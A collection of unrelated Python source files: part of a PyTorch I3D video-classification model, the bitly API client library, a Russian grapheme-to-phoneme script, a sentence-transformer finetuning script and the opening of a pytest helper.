padding_shapes = [get_padding_shape(kernel_size, stride, mod) for
mod in range(stride[0])]
else:
padding_shapes = [padding_shape]
elif padding == 'VALID':
padding_shape = 0
else:
raise ValueError(
'padding should be in [VALID|SAME] but got {}'.format(padding))
if padding == 'SAME':
if not simplify_pad:
self.pads = [torch.nn.ConstantPad3d(x, 0) for x in padding_shapes]
self.conv3d = torch.nn.Conv3d(
in_channels,
out_channels,
kernel_size,
stride=stride,
bias=use_bias)
else:
self.conv3d = torch.nn.Conv3d(
in_channels,
out_channels,
kernel_size,
stride=stride,
padding=pad_size,
bias=use_bias)
elif padding == 'VALID':
self.conv3d = torch.nn.Conv3d(
in_channels,
out_channels,
kernel_size,
padding=padding_shape,
stride=stride,
bias=use_bias)
else:
raise ValueError(
'padding should be in [VALID|SAME] but got {}'.format(padding))
if self.use_bn:
# This is not strictly the correct map between epsilons in keras and
# pytorch (which have slightly different definitions of the batch norm
# forward pass), but it seems to be good enough. The PyTorch formula
# is described here:
# https://pytorch.org/docs/stable/_modules/torch/nn/modules/batchnorm.html
tf_style_eps = 1E-3
self.batch3d = torch.nn.BatchNorm3d(out_channels, eps=tf_style_eps)
if activation == 'relu':
self.activation = torch.nn.functional.relu
def forward(self, inp):
if self.padding == 'SAME' and self.simplify_pad is False:
# Determine the padding to be applied by examining the input shape
pad_idx = inp.shape[2] % self.stride[0]
pad_op = self.pads[pad_idx]
inp = pad_op(inp)
out = self.conv3d(inp)
if self.use_bn:
out = self.batch3d(out)
if self.activation is not None:
out = torch.nn.functional.relu(out)
return out
class MaxPool3dTFPadding(torch.nn.Module):
def __init__(self, kernel_size, stride=None, padding='SAME'):
super(MaxPool3dTFPadding, self).__init__()
if padding == 'SAME':
padding_shape = get_padding_shape(kernel_size, stride)
self.padding_shape = padding_shape
self.stride = stride
if stride[0] > 1:
padding_shapes = [get_padding_shape(kernel_size, stride, mod) for
mod in range(stride[0])]
else:
padding_shapes = [padding_shape]
self.pads = [torch.nn.ConstantPad3d(x, 0) for x in padding_shapes]
self.pool = torch.nn.MaxPool3d(kernel_size, stride, ceil_mode=True)
def forward(self, inp):
pad_idx = inp.shape[2] % self.stride[0]
pad_op = self.pads[pad_idx]
inp = pad_op(inp)
out = self.pool(inp)
return out
class Mixed(torch.nn.Module):
def __init__(self, in_channels, out_channels):
super(Mixed, self).__init__()
# Branch 0
self.branch_0 = Unit3Dpy(
in_channels, out_channels[0], kernel_size=(1, 1, 1))
# Branch 1
branch_1_conv1 = Unit3Dpy(
in_channels, out_channels[1], kernel_size=(1, 1, 1))
branch_1_conv2 = Unit3Dpy(
out_channels[1], out_channels[2], kernel_size=(3, 3, 3))
self.branch_1 = torch.nn.Sequential(branch_1_conv1, branch_1_conv2)
# Branch 2
branch_2_conv1 = Unit3Dpy(
in_channels, out_channels[3], kernel_size=(1, 1, 1))
branch_2_conv2 = Unit3Dpy(
out_channels[3], out_channels[4], kernel_size=(3, 3, 3))
self.branch_2 = torch.nn.Sequential(branch_2_conv1, branch_2_conv2)
# Branch3
branch_3_pool = MaxPool3dTFPadding(
kernel_size=(3, 3, 3), stride=(1, 1, 1), padding='SAME')
branch_3_conv2 = Unit3Dpy(
in_channels, out_channels[5], kernel_size=(1, 1, 1))
self.branch_3 = torch.nn.Sequential(branch_3_pool, branch_3_conv2)
def forward(self, inp):
out_0 = self.branch_0(inp)
out_1 = self.branch_1(inp)
out_2 = self.branch_2(inp)
out_3 = self.branch_3(inp)
out = torch.cat((out_0, out_1, out_2, out_3), 1)
return out
class I3D(torch.nn.Module):
def __init__(self,
num_classes,
modality='rgb',
dropout_prob=0,
name='inception'):
super(I3D, self).__init__()
self.name = name
self.num_classes = num_classes
if modality == 'rgb':
in_channels = 3
elif modality == 'flow':
in_channels = 2
else:
raise ValueError(
'{} not among known modalities [rgb|flow]'.format(modality))
self.modality = modality
conv3d_1a_7x7 = Unit3Dpy(
out_channels=64,
in_channels=in_channels,
kernel_size=(7, 7, 7),
stride=(2, 2, 2),
padding='SAME')
# 1st conv-pool
self.conv3d_1a_7x7 = conv3d_1a_7x7
self.maxPool3d_2a_3x3 = MaxPool3dTFPadding(
kernel_size=(1, 3, 3), stride=(1, 2, 2), padding='SAME')
# conv conv
conv3d_2b_1x1 = Unit3Dpy(
out_channels=64,
in_channels=64,
kernel_size=(1, 1, 1),
padding='SAME')
self.conv3d_2b_1x1 = conv3d_2b_1x1
conv3d_2c_3x3 = Unit3Dpy(
out_channels=192,
in_channels=64,
kernel_size=(3, 3, 3),
padding='SAME')
self.conv3d_2c_3x3 = conv3d_2c_3x3
self.maxPool3d_3a_3x3 = MaxPool3dTFPadding(
kernel_size=(1, 3, 3), stride=(1, 2, 2), padding='SAME')
# Mixed_3b
self.mixed_3b = Mixed(192, [64, 96, 128, 16, 32, 32])
self.mixed_3c = Mixed(256, [128, 128, 192, 32, 96, 64])
self.maxPool3d_4a_3x3 = MaxPool3dTFPadding(
kernel_size=(3, 3, 3), stride=(2, 2, 2), padding='SAME')
# Mixed 4
self.mixed_4b = Mixed(480, [192, 96, 208, 16, 48, 64])
self.mixed_4c = Mixed(512, [160, 112, 224, 24, 64, 64])
self.mixed_4d = Mixed(512, [128, 128, 256, 24, 64, 64])
self.mixed_4e = Mixed(512, [112, 144, 288, 32, 64, 64])
self.mixed_4f = Mixed(528, [256, 160, 320, 32, 128, 128])
self.maxPool3d_5a_2x2 = MaxPool3dTFPadding(
kernel_size=(2, 2, 2), stride=(2, 2, 2), padding='SAME')
# Mixed 5
self.mixed_5b = Mixed(832, [256, 160, 320, 32, 128, 128])
self.mixed_5c = Mixed(832, [384, 192, 384, 48, 128, 128])
self.avg_pool = torch.nn.AvgPool3d((2, 7, 7), (1, 1, 1))
self.dropout = torch.nn.Dropout(dropout_prob)
self.conv3d_0c_1x1 = Unit3Dpy(
in_channels=1024,
out_channels=self.num_classes,
kernel_size=(1, 1, 1),
activation=None,
use_bias=True,
use_bn=False)
self.softmax = torch.nn.Softmax(1)
for param in self.parameters():
param.requires_grad = False
def forward(self, inp):
# Preprocessing
out = self.conv3d_1a_7x7(inp)
out = self.maxPool3d_2a_3x3(out)
out = self.conv3d_2b_1x1(out)
out = self.conv3d_2c_3x3(out)
out = self.maxPool3d_3a_3x3(out)
out = self.mixed_3b(out)
out = self.mixed_3c(out)
out = self.maxPool3d_4a_3x3(out)
out = self.mixed_4b(out)
out = self.mixed_4c(out)
out = self.mixed_4d(out)
out = self.mixed_4e(out)
out = self.mixed_4f(out)
out = self.maxPool3d_5a_2x2(out)
out = self.mixed_5b(out)
out = self.mixed_5c(out)
out = self.avg_pool(out)
out = self.dropout(out)
out = self.conv3d_0c_1x1(out)
out = out.squeeze(3)
out = out.squeeze(3)
out = out.mean(2)
out_logits = out
out = self.softmax(out_logits)
return out, out_logits
|
157765
|
line = input()
abbr = line[0]
for i in range(len(line)):
if line[i] == "-":
abbr += line[i+1]
print(abbr)
|
157777
|
import hashlib
import json
import sys
import time
import types
import warnings
try:
from urllib.request import build_opener, HTTPRedirectHandler
from urllib.parse import urlencode
from urllib.error import URLError, HTTPError
string_types = str,
integer_types = int,
numeric_types = (int, float)
text_type = str
binary_type = bytes
except ImportError as e:
from urllib2 import build_opener, HTTPRedirectHandler, URLError, HTTPError
from urllib import urlencode
string_types = basestring,
integer_types = (int, long)
numeric_types = (int, long, float)
text_type = unicode
binary_type = str
class DontRedirect(HTTPRedirectHandler):
def redirect_response(self, req, fp, code, msg, headers, newurl):
if code in (301, 302, 303, 307):
raise HTTPError(req.get_full_url(), code, msg, headers, fp)
class Error(Exception):
pass
class BitlyError(Error):
def __init__(self, code, message):
Error.__init__(self, message)
self.code = code
def _utf8(s):
if isinstance(s, text_type):
s = s.encode('utf-8')
assert isinstance(s, binary_type)
return s
def _utf8_params(params):
"""encode a dictionary of URL parameters (including iterables) as utf-8"""
assert isinstance(params, dict)
encoded_params = []
for k, v in params.items():
if v is None:
continue
if isinstance(v, numeric_types):
v = str(v)
if isinstance(v, (list, tuple)):
v = [_utf8(x) for x in v]
else:
v = _utf8(v)
encoded_params.append((k, v))
return dict(encoded_params)
class Connection(object):
"""
This is a python library for accessing the bitly api
http://github.com/bitly/bitly-api-python
Usage:
import bitly_api
c = bitly_api.Connection('bitlyapidemo','R_{{apikey}}')
# or to use oauth2 endpoints
c = bitly_api.Connection(access_token='...')
c.shorten('http://www.google.com/')
"""
def __init__(self, login=None, api_key=None, access_token=None,
secret=None):
self.host = 'api.bit.ly'
self.ssl_host = 'api-ssl.bit.ly'
self.login = login
self.api_key = api_key
self.access_token = access_token
self.secret = secret
(major, minor, micro, releaselevel, serial) = sys.version_info
parts = (major, minor, micro, '?')
self.user_agent = "Python/%d.%d.%d bitly_api/%s" % parts
def shorten(self, uri, x_login=None, x_apiKey=None, preferred_domain=None):
""" creates a bitly link for a given long url
@parameter uri: long url to shorten
@parameter x_login: login of a user to shorten on behalf of
@parameter x_apiKey: apiKey of a user to shorten on behalf of
@parameter preferred_domain: bit.ly[default], bitly.com, or j.mp
"""
params = dict(uri=uri)
if preferred_domain:
params['domain'] = preferred_domain
if x_login:
params.update({
'x_login': x_login,
'x_apiKey': x_apiKey})
data = self._call(self.host, 'v3/shorten', params, self.secret)
return data['data']
def expand(self, hash=None, shortUrl=None, link=None):
""" given a bitly url or hash, decode it and return the target url
@parameter hash: one or more bitly hashes
@parameter shortUrl: one or more bitly short urls
@parameter link: one or more bitly short urls (preferred vocabulary)
"""
if link and not shortUrl:
shortUrl = link
if not hash and not shortUrl:
raise BitlyError(500, 'MISSING_ARG_SHORTURL')
params = dict()
if hash:
params['hash'] = hash
if shortUrl:
params['shortUrl'] = shortUrl
data = self._call(self.host, 'v3/expand', params, self.secret)
return data['data']['expand']
def clicks(self, hash=None, shortUrl=None):
"""
given a bitly url or hash, get statistics about the clicks on that link
"""
warnings.warn("/v3/clicks is depricated in favor of /v3/link/clicks",
DeprecationWarning)
if not hash and not shortUrl:
raise BitlyError(500, 'MISSING_ARG_SHORTURL')
params = dict()
if hash:
params['hash'] = hash
if shortUrl:
params['shortUrl'] = shortUrl
data = self._call(self.host, 'v3/clicks', params, self.secret)
return data['data']['clicks']
def referrers(self, hash=None, shortUrl=None):
"""
given a bitly url or hash, get statistics about the referrers of that
link
"""
warnings.warn("/v3/referrers is depricated in favor of "
"/v3/link/referrers", DeprecationWarning)
if not hash and not shortUrl:
raise BitlyError(500, 'MISSING_ARG_SHORTURL')
params = dict()
if hash:
params['hash'] = hash
if shortUrl:
params['shortUrl'] = shortUrl
data = self._call(self.host, 'v3/referrers', params, self.secret)
return data['data']['referrers']
def clicks_by_day(self, hash=None, shortUrl=None):
""" given a bitly url or hash, get a time series of clicks
per day for the last 30 days in reverse chronological order
(most recent to least recent) """
warnings.warn("/v3/clicks_by_day is depricated in favor of "
"/v3/link/clicks?unit=day", DeprecationWarning)
if not hash and not shortUrl:
raise BitlyError(500, 'MISSING_ARG_SHORTURL')
params = dict()
if hash:
params['hash'] = hash
if shortUrl:
params['shortUrl'] = shortUrl
data = self._call(self.host, 'v3/clicks_by_day', params, self.secret)
return data['data']['clicks_by_day']
def clicks_by_minute(self, hash=None, shortUrl=None):
""" given a bitly url or hash, get a time series of clicks
per minute for the last 30 minutes in reverse chronological
order (most recent to least recent)"""
warnings.warn("/v3/clicks_by_minute is depricated in favor of "
"/v3/link/clicks?unit=minute", DeprecationWarning)
if not hash and not shortUrl:
raise BitlyError(500, 'MISSING_ARG_SHORTURL')
params = dict()
if hash:
params['hash'] = hash
if shortUrl:
params['shortUrl'] = shortUrl
data = self._call(self.host, 'v3/clicks_by_minute', params,
self.secret)
return data['data']['clicks_by_minute']
def link_clicks(self, link, **kwargs):
params = dict(link=link)
data = self._call_oauth2_metrics("v3/link/clicks", params, **kwargs)
return data["link_clicks"]
def link_encoders(self, link, **kwargs):
"""return the bitly encoders who have saved this link"""
params = dict(link=link)
data = self._call(self.host, 'v3/link/encoders', params, **kwargs)
return data['data']
def link_encoders_count(self, link, **kwargs):
"""return the count of bitly encoders who have saved this link"""
params = dict(link=link)
data = self._call(self.host, 'v3/link/encoders_count', params,
**kwargs)
return data['data']
def link_referring_domains(self, link, **kwargs):
"""
returns the domains that are referring traffic to a single bitly link
"""
params = dict(link=link)
data = self._call_oauth2_metrics("v3/link/referring_domains", params,
**kwargs)
return data["referring_domains"]
def link_referrers_by_domain(self, link, **kwargs):
"""
returns the pages that are referring traffic to a single bitly link,
grouped by domain
"""
params = dict(link=link)
data = self._call_oauth2_metrics("v3/link/referrers_by_domain", params,
**kwargs)
return data["referrers"]
def link_referrers(self, link, **kwargs):
"""
returns the pages are are referring traffic to a single bitly link
"""
params = dict(link=link)
data = self._call_oauth2_metrics("v3/link/referrers", params, **kwargs)
return data["referrers"]
def link_shares(self, link, **kwargs):
"""return number of shares of a bitly link"""
params = dict(link=link)
data = self._call_oauth2_metrics("v3/link/shares", params, **kwargs)
return data
def link_countries(self, link, **kwargs):
params = dict(link=link)
data = self._call_oauth2_metrics("v3/link/countries", params, **kwargs)
return data["countries"]
def user_clicks(self, **kwargs):
"""aggregate number of clicks on all of this user's bitly links"""
data = self._call_oauth2_metrics('v3/user/clicks', dict(), **kwargs)
return data
def user_countries(self, **kwargs):
"""
aggregate metrics about countries from which people are clicking on all
of a user's bitly links
"""
data = self._call_oauth2_metrics('v3/user/countries', dict(), **kwargs)
return data["countries"]
def user_popular_links(self, **kwargs):
data = self._call_oauth2_metrics("v3/user/popular_links", dict(),
**kwargs)
return data["popular_links"]
def user_referrers(self, **kwargs):
"""
aggregate metrics about the referrers for all of the authed user's
bitly links
"""
data = self._call_oauth2_metrics("v3/user/referrers", dict(), **kwargs)
return data["referrers"]
def user_referring_domains(self, **kwargs):
"""
aggregate metrics about the domains referring traffic to all of the
authed user's bitly links
"""
data = self._call_oauth2_metrics("v3/user/referring_domains", dict(),
**kwargs)
return data["referring_domains"]
def user_share_counts(self, **kwargs):
"""number of shares by authed user in given time period"""
data = self._call_oauth2_metrics("v3/user/share_counts", dict(),
**kwargs)
return data["share_counts"]
def user_share_counts_by_share_type(self, **kwargs):
"""
number of shares by authed user broken down by type (facebook, twitter,
email) in a give time period
"""
data = self._call_oauth2_metrics("v3/user/share_counts_by_share_type",
dict(), **kwargs)
return data["share_counts_by_share_type"]
def user_shorten_counts(self, **kwargs):
data = self._call_oauth2_metrics("v3/user/shorten_counts", dict(),
**kwargs)
return data["user_shorten_counts"]
def user_tracking_domain_list(self):
data = self._call_oauth2("v3/user/tracking_domain_list", dict())
return data["tracking_domains"]
def user_tracking_domain_clicks(self, domain, **kwargs):
params = dict(domain=domain)
data = self._call_oauth2_metrics("v3/user/tracking_domain_clicks",
params, **kwargs)
return data["tracking_domain_clicks"]
def user_tracking_domain_shorten_counts(self, domain, **kwargs):
params = dict(domain=domain)
data = self._call_oauth2_metrics(
"v3/user/tracking_domain_shorten_counts", params, **kwargs)
return data["tracking_domain_shorten_counts"]
def user_info(self, **kwargs):
"""return or update info about a user"""
data = self._call_oauth2("v3/user/info", kwargs)
return data
def user_link_history(self, created_before=None, created_after=None,
archived=None, limit=None, offset=None,
private=None):
params = dict()
if created_before is not None:
assert isinstance(limit, integer_types)
params["created_before"] = created_before
if created_after is not None:
assert isinstance(limit, integer_types)
params["created_after"] = created_after
if archived is not None:
assert isinstance(archived, string_types)
archived = archived.lower()
assert archived is "on" or "off" or "both"
params["archived"] = archived
if private is not None:
assert isinstance(private, string_types)
private = private.lower()
assert private is "on" or "off" or "both"
params["private"] = private
if limit is not None:
assert isinstance(limit, integer_types)
params["limit"] = str(limit)
if offset is not None:
assert isinstance(offset, integer_types)
params["offset"] = str(offset)
data = self._call_oauth2("v3/user/link_history", params)
return data["link_history"]
def user_network_history(self, offset=None, expand_client_id=False,
limit=None, expand_user=False):
params = dict()
if expand_client_id is True:
params["expand_client_id"] = "true"
if expand_user is True:
params["expand_user"] = "true"
if offset is not None:
assert isinstance(offset, integer_types)
params["offset"] = str(offset)
if limit is not None:
assert isinstance(limit, integer_types)
params["limit"] = str(limit)
data = self._call_oauth2("v3/user/network_history", params)
return data
def info(self, hash=None, shortUrl=None, link=None):
""" return the page title for a given bitly link """
if link and not shortUrl:
shortUrl = link
if not hash and not shortUrl:
raise BitlyError(500, 'MISSING_ARG_SHORTURL')
params = dict()
if hash:
params['hash'] = hash
if shortUrl:
params['shortUrl'] = shortUrl
data = self._call(self.host, 'v3/info', params, self.secret)
return data['data']['info']
def link_lookup(self, url):
"""query for a bitly link based on a long url (or list of long urls)"""
params = dict(url=url)
data = self._call(self.host, 'v3/link/lookup', params, self.secret)
return data['data']['link_lookup']
def lookup(self, url):
""" query for a bitly link based on a long url """
warnings.warn("/v3/lookup is depricated in favor of /v3/link/lookup",
DeprecationWarning)
params = dict(url=url)
data = self._call(self.host, 'v3/lookup', params, self.secret)
return data['data']['lookup']
def user_link_edit(self, link, edit, title=None, note=None, private=None,
user_ts=None, archived=None):
"""edit a link in a user's history"""
params = dict()
if not link:
raise BitlyError(500, 'MISSING_ARG_LINK')
if not edit:
raise BitlyError(500, 'MISSING_ARG_EDIT')
params['link'] = link
params['edit'] = edit
if title is not None:
params['title'] = str(title)
if note is not None:
params['note'] = str(note)
if private is not None:
params['private'] = bool(private)
if user_ts is not None:
params['user_ts'] = user_ts
if archived is not None:
params['archived'] = archived
data = self._call_oauth2("v3/user/link_edit", params)
return data['link_edit']
def user_link_lookup(self, url):
"""
query for whether a user has shortened a particular long URL. don't
confuse with v3/link/lookup.
"""
params = dict(url=url)
data = self._call(self.host, 'v3/user/link_lookup', params,
self.secret)
return data['data']['link_lookup']
def user_link_save(self, longUrl=None, long_url=None, title=None,
note=None, private=None, user_ts=None):
"""save a link into the user's history"""
params = dict()
if not longUrl and not long_url:
raise BitlyError('500', 'MISSING_ARG_LONG_URL')
params['longUrl'] = longUrl or long_url
if title is not None:
params['title'] = str(title)
if note is not None:
params['note'] = str(note)
if private is not None:
params['private'] = bool(private)
if user_ts is not None:
params['user_ts'] = user_ts
data = self._call_oauth2("v3/user/link_save", params)
return data['link_save']
def pro_domain(self, domain):
""" is the domain assigned for bitly.pro? """
end_point = 'v3/bitly_pro_domain'
if not domain:
raise BitlyError(500, 'MISSING_ARG_DOMAIN')
protocol_prefix = ('http://', 'https://')
if domain.lower().startswith(protocol_prefix):
raise BitlyError(500, 'INVALID_BARE_DOMAIN')
params = dict(domain=domain)
data = self._call(self.host, end_point, params, self.secret)
return data['data']['bitly_pro_domain']
def bundle_archive(self, bundle_link):
"""archive a bundle for the authenticated user"""
params = dict(bundle_link=bundle_link)
data = self._call_oauth2_metrics("v3/bundle/archive", params)
return data
def bundle_bundles_by_user(self, user=None, expand_user=False):
"""list bundles by user (defaults to authed user)"""
params = dict()
if user is not None:
params["user"] = user
if expand_user is True:
params["expand_user"] = "true"
data = self._call_oauth2_metrics("v3/bundle/bundles_by_user", params)
return data
def bundle_clone(self, bundle_link): # TODO: 500s
"""clone a bundle for the authenticated user"""
params = dict(bundle_link=bundle_link)
data = self._call_oauth2_metrics("v3/bundle/clone", params)
return data
def bundle_collaborator_add(self, bundle_link, collaborator=None):
"""add a collaborator a bundle"""
params = dict(bundle_link=bundle_link)
if collaborator is not None:
params["collaborator"] = collaborator
data = self._call_oauth2_metrics("v3/bundle/collaborator_add", params)
return data
def bundle_collaborator_remove(self, bundle_link, collaborator):
"""remove a collaborator from a bundle"""
params = dict(bundle_link=bundle_link)
params["collaborator"] = collaborator
data = self._call_oauth2_metrics("v3/bundle/collaborator_remove",
params)
return data
def bundle_contents(self, bundle_link, expand_user=False):
"""list the contents of a bundle"""
params = dict(bundle_link=bundle_link)
if expand_user:
params["expand_user"] = "true"
data = self._call_oauth2_metrics("v3/bundle/contents", params)
return data
def bundle_create(self, private=False, title=None, description=None):
"""create a bundle"""
params = dict()
if private:
params["private"] = "true"
if title is not None:
assert isinstance(title, string_types)
params["title"] = title
if description is not None:
assert isinstance(description, string_types)
params["description"] = description
data = self._call_oauth2_metrics("v3/bundle/create", params)
return data
def bundle_edit(self, bundle_link, edit=None, title=None, description=None,
private=None, preview=None, og_image=None):
"""edit a bundle for the authenticated user"""
params = dict(bundle_link=bundle_link)
if edit:
assert isinstance(edit, string_types)
params["edit"] = edit
if title:
assert isinstance(title, string_types)
params["title"] = title
if description:
assert isinstance(description, string_types)
params["description"] = description
if private is not None:
if private:
params["private"] = "true"
else:
params["private"] = "false"
if preview is not None:
if preview:
params["preview"] = "true"
else:
params["preview"] = "false"
if og_image:
assert isinstance(og_image, string_types)
params["og_image"] = og_image
data = self._call_oauth2_metrics("v3/bundle/edit", params)
return data
def bundle_link_add(self, bundle_link, link, title=None):
"""add a link to a bundle"""
params = dict(bundle_link=bundle_link, link=link)
if title:
assert isinstance(title, string_types)
params["title"] = title
data = self._call_oauth2_metrics("v3/bundle/link_add", params)
return data
def bundle_link_comment_add(self, bundle_link, link, comment):
"""add a comment to a link in a bundle"""
params = dict(bundle_link=bundle_link, link=link, comment=comment)
data = self._call_oauth2_metrics("v3/bundle/link_comment_add", params)
return data
def bundle_link_comment_edit(self, bundle_link, link, comment_id, comment):
"""edit a comment on a link in a bundle"""
params = dict(bundle_link=bundle_link, link=link,
comment_id=comment_id, comment=comment)
data = self._call_oauth2_metrics("v3/bundle/link_comment_edit", params)
return data
def bundle_link_comment_remove(self, bundle_link, link, comment_id):
""" remove a comment on a link in a bundle"""
params = dict(bundle_link=bundle_link, link=link,
comment_id=comment_id)
data = self._call_oauth2_metrics("v3/bundle/link_comment_remove",
params)
return data
def bundle_link_edit(self, bundle_link, link, edit, title=None,
preview=None):
""" edit the title for a link """
params = dict(bundle_link=bundle_link, link=link)
if edit == "title":
params["edit"] = edit
assert isinstance(title, string_types)
params["title"] = title
elif edit == "preview":
params["edit"] = edit
assert isinstance(preview, bool)
if preview:
params["preview"] = "true"
else:
params["preview"] = "false"
else:
raise BitlyError(500,
"PARAM EDIT MUST HAVE VALUE TITLE OR PREVIEW")
data = self._call_oauth2_metrics("v3/bundle/link_edit", params)
return data
def bundle_link_remove(self, bundle_link, link):
""" remove a link from a bundle """
params = dict(bundle_link=bundle_link, link=link)
data = self._call_oauth2_metrics("v3/bundle/link_remove", params)
return data
def bundle_link_reorder(self, bundle_link, link, display_order):
""" reorder the links in a bundle"""
params = dict(bundle_link=bundle_link, link=link,
display_order=display_order)
data = self._call_oauth2_metrics("v3/bundle/link_reorder", params)
return data
def bundle_pending_collaborator_remove(self, bundle_link, collaborator):
"""remove a pending collaborator from a bundle"""
params = dict(bundle_link=bundle_link)
params["collaborator"] = collaborator
data = self._call_oauth2_metrics(
"v3/bundle/pending_collaborator_remove", params)
return data
def bundle_view_count(self, bundle_link):
""" get the number of views on a bundle """
params = dict(bundle_link=bundle_link)
data = self._call_oauth2_metrics("v3/bundle/view_count", params)
return data
def user_bundle_history(self):
""" return the bundles that this user has access to """
data = self._call_oauth2_metrics("v3/user/bundle_history", dict())
return data
def highvalue(self, limit=10, lang='en'):
params = dict(lang=lang)
data = self._call_oauth2_metrics("v3/highvalue", params, limit=limit)
return data
def realtime_bursting_phrases(self):
data = self._call_oauth2_metrics("v3/realtime/bursting_phrases",
dict())
return data["phrases"]
def realtime_hot_phrases(self):
data = self._call_oauth2_metrics("v3/realtime/hot_phrases", dict())
return data["phrases"]
def realtime_clickrate(self, phrase):
params = dict(phrase=phrase)
data = self._call_oauth2_metrics("v3/realtime/clickrate", params)
return data["rate"]
def link_info(self, link):
params = dict(link=link)
data = self._call_oauth2_metrics("v3/link/info", params)
return data
def link_content(self, link, content_type="html"):
params = dict(link=link, content_type=content_type)
data = self._call_oauth2_metrics("v3/link/content", params)
return data["content"]
def link_category(self, link):
params = dict(link=link)
data = self._call_oauth2_metrics("v3/link/category", params)
return data["categories"]
def link_social(self, link):
params = dict(link=link)
data = self._call_oauth2_metrics("v3/link/social", params)
return data["social_scores"]
def link_location(self, link):
params = dict(link=link)
data = self._call_oauth2_metrics("v3/link/location", params)
return data["locations"]
def link_language(self, link):
params = dict(link=link)
data = self._call_oauth2_metrics("v3/link/language", params)
return data["languages"]
def search(self, query, offset=None, cities=None, domain=None, fields=None,
limit=10, lang='en'):
params = dict(query=query, lang=lang)
if offset:
assert isinstance(offset, integer_types)
params["offset"] = str(offset)
if cities: # TODO: check format
assert isinstance(cities, string_types)
params["cities"] = cities
if domain:
assert isinstance(domain, string_types)
params["domain"] = domain
if fields:
assert isinstance(fields, string_types)
params["fields"] = fields
data = self._call_oauth2_metrics("v3/search", params, limit=limit)
return data['results']
@classmethod
def _generateSignature(self, params, secret):
if not params or not secret:
return ""
hash_string = ""
if not params.get('t'):
# note, this uses a utc timestamp not a local timestamp
params['t'] = str(int(time.mktime(time.gmtime())))
keys = params.keys()
keys.sort()
for k in keys:
if type(params[k]) in [types.ListType, types.TupleType]:
for v in params[k]:
hash_string += v
else:
hash_string += params[k]
hash_string += secret
signature = hashlib.md5(hash_string).hexdigest()[:10]
return signature
def _call_oauth2_metrics(self, endpoint, params, unit=None, units=None,
tz_offset=None, rollup=None, limit=None,
unit_reference_ts=None):
if unit is not None:
assert unit in ("minute", "hour", "day", "week", "mweek", "month")
params["unit"] = unit
if units is not None:
assert isinstance(units, integer_types), \
"Unit (%r) must be integer" % units
params["units"] = units
if tz_offset is not None:
# tz_offset can either be a hour offset, or a timezone like
# North_America/New_York
if isinstance(tz_offset, integer_types):
msg = "integer tz_offset must be between -12 and 12"
assert -12 <= tz_offset <= 12, msg
else:
assert isinstance(tz_offset, string_types)
params["tz_offset"] = tz_offset
if rollup is not None:
assert isinstance(rollup, bool)
params["rollup"] = "true" if rollup else "false"
if limit is not None:
assert isinstance(limit, integer_types)
params["limit"] = limit
if unit_reference_ts is not None:
assert (unit_reference_ts == 'now' or
isinstance(unit_reference_ts, integer_types))
params["unit_reference_ts"] = unit_reference_ts
return self._call_oauth2(endpoint, params)
def _call_oauth2(self, endpoint, params):
assert self.access_token, "This %s endpoint requires OAuth" % endpoint
return self._call(self.ssl_host, endpoint, params)["data"]
def _call(self, host, method, params, secret=None, timeout=5000):
params['format'] = params.get('format', 'json') # default to json
if self.access_token:
scheme = 'https'
params['access_token'] = self.access_token
host = self.ssl_host
else:
scheme = 'http'
params['login'] = self.login
params['apiKey'] = self.api_key
if secret:
params['signature'] = self._generateSignature(params, secret)
# force to utf8 to fix ascii codec errors
params = _utf8_params(params)
request = "%(scheme)s://%(host)s/%(method)s?%(params)s" % {
'scheme': scheme,
'host': host,
'method': method,
'params': urlencode(params, doseq=1)
}
try:
opener = build_opener(DontRedirect())
opener.addheaders = [('User-agent', self.user_agent + ' urllib')]
response = opener.open(request)
code = response.code
result = response.read().decode('utf-8')
if code != 200:
raise BitlyError(500, result)
if not result.startswith('{'):
raise BitlyError(500, result)
data = json.loads(result)
if data.get('status_code', 500) != 200:
raise BitlyError(data.get('status_code', 500),
data.get('status_txt', 'UNKNOWN_ERROR'))
return data
except URLError as e:
raise BitlyError(500, str(e))
except HTTPError as e:
raise BitlyError(e.code, e.read())
except BitlyError:
raise
except Exception:
raise BitlyError(None, sys.exc_info()[1])
|
157801
|
from russian_g2p import Grapheme2Phoneme
from russian_g2p import Accentor
import json
import codecs
words = open('/home/a117/Документы/Linguistics/russian_g2p/corpus/wordlist')
words = words.readlines()
# words = ['я']
# acc = Accentor()
g2p = Grapheme2Phoneme()
new_simple_words = {}
with open('new', 'w') as f:
for word in words:
word = word.strip()
'''
print(word)
res, added_simple_words = acc.do_accents([word])
new_simple_words = {**new_simple_words, **added_simple_words}
if len(res) != 1:
print('word has many vars', res)
word2transcribe = word
else:
print('word has one var', res)
word2transcribe = res[0][0]
print(word2transcribe)
'''
word2transcribe = word # Daniil
transcriptions = g2p.phrase_to_phonemes(word2transcribe)
# print('{} {}\n'.format(word, ' '.join(transcriptions)))
f.writelines('{} {}\n'.format(word, ' '.join(transcriptions)))
#with codecs.open('new_simple_words.json', mode='w', encoding='utf-8', errors='ignore') as fp:
# data = json.dump(new_simple_words, fp)
|
157804
|
from gamechangerml.src.search.sent_transformer.finetune import STFinetuner
from gamechangerml.configs.config import EmbedderConfig
from gamechangerml.api.utils.pathselect import get_model_paths
from gamechangerml.api.utils.logger import logger
import argparse
import os
from datetime import datetime
model_path_dict = get_model_paths()
LOCAL_TRANSFORMERS_DIR = model_path_dict["transformers"]
BASE_MODEL_NAME = EmbedderConfig.BASE_MODEL
def main(data_path, model_load_path, model_save_path):
tuner = STFinetuner(model_load_path=model_load_path, model_save_path=model_save_path, **EmbedderConfig.FINETUNE)
return tuner.retrain(data_path)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Finetuning the sentence transformer model")
parser.add_argument(
"--data-path", "-d",
dest="data_path",
required=True,
help="path to csv with finetuning data"
)
parser.add_argument(
"--model-load-path", "-m",
dest="model_load_path",
required=False,
help="path to load model for fine-tuning"
)
parser.add_argument(
"--model-save-path", "-s",
dest="model_save_path",
required=False,
help="path to save model after fine-tuning"
)
args = parser.parse_args()
## getting default paths
if args.model_load_path:
model_load_path = args.model_load_path
else:
model_load_path = os.path.join(LOCAL_TRANSFORMERS_DIR, BASE_MODEL_NAME)
if args.model_save_path:
model_save_path = args.model_save_path
else:
model_save_path = model_load_path + str(datetime.now().strftime("%Y%m%d"))
data_path = args.data_path
logger.info("\n|---------------------Beginning to finetune model-----------------------|")
main(data_path, model_load_path, model_save_path)
logger.info("|------------------------Done finetuning model--------------------------|\n")
|
157819
|
from typing import Callable, Dict, Iterable, Optional, Tuple, Type
from urllib.parse import parse_qs, urlparse
import pytest
from rest_registration.utils.signers import URLParamsSigner
from tests.helpers.timer import Timer
def assert_valid_verification_url(
url: str,
